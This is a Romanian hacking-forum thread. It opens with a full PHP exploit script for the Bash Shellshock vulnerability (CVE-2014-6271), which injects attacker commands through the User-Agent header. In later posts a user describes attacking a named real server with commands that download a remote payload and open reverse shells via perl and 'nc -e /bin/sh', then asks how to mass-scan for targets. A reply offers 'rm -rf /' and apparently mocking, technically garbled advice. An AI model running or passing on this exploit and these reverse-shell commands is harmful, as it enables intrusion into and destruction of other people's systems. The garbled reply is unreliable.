Aerosol Posted September 25, 2014 Report Posted September 25, 2014 <?php/*Title: Bash Specially-crafted Environment Variables Code Injection VulnerabilityCVE: 2014-6271Vendor Homepage: https://www.gnu.org/software/bash/Author: Prakhar Prasad && Subho HalderAuthor Homepage: https://prakharprasad.com && https://appknox.comDate: September 25th 2014Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26 GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/Test CGI Code : #!/bin/bash echo "Content-type: text/html" echo "" echo "Bash-is-Vulnerable"*/error_reporting(0);if(!defined('STDIN')) die("Please run it through command-line!\n");$x = getopt("u:c:");if(!isset($x['u']) || !isset($x['c'])){ die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");}$url = $x['u'];$cmd = $x['c'];$context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ));$req = file_get_contents($url, false, $context);if(!$req && strpos($http_response_header[0],"500") > 0 ) die("Command sent to the server!\n");else if($req && !strpos($http_response_header[0],"500") > 0) die("Server didn't respond as it should!\n");else if(!$req && $http_response_header == NULL) die("A connection error occurred!\n")?>Source Quote
florinul Posted September 26, 2014 Report Posted September 26, 2014 ma indruma si pe mine cineva ? am inccat pe mai multe servere asa php php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c" wget http://suse.altervista.org/s/dc.txt -O /tmp/dc.txt" php php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c " perl dc.txt ip.ip.ip.ip 2121"sau php -u http://www.gallery.cz/cgi-bin/gallery/hynekol/aps.sh -c"/ bin/nc -e /bin/sh ip.ip.ip.ip 2121"si nu a mers pe nici unul . imi xplica si mie cineva cum fac nc pe serverle vuln de bash ? Quote
Nytro Posted September 26, 2014 Report Posted September 26, 2014 Nici nu o sa mearga vreodata.Ai citit macar un articol despre problema?Stii tu, acel "() {" ? Quote
florinul Posted September 26, 2014 Report Posted September 26, 2014 Nytro recunosc nu ma mai priceo deoarece nu mam mai ocupat ani de zile . Mai degraba explicami cum sa scanez mass cu el de exemplu cu pnscan ala nu se poate ? Quote
Nytro Posted September 26, 2014 Report Posted September 26, 2014 Este usor de exploatat pentru un singur server, insa se complica lucrurile pentru mai multe servere.De exemplu, un clasic (){:;}; rm -rf / nu va merge pe orice server, deoarece multe servere au SELinux peste kernel, iar grsecurity opreste exploatarea inca din layer-ul 2 de retea! Singurul lucru care se poate incerca, e un exploit de privilege escalation, prin care controland ESP-ul, sa modifici page memory-ul care contine acel script si astfel sa faci bypass schimband protocolul din TCP in ICMP. Dar iti dai seama ca este dificil sa faci asa ceva, mai ales ca sunt foarte multe versiuni de kernel si ca sa fie compatibil va trebui sa gasesti semnaturi pentru functii si IOCTL-uri care controleaza SSDT-ul si valideaza integritatea codului... Adica cel mai bine citeste articolele si incearca sa le intelegi, nu e asa dificil. Quote
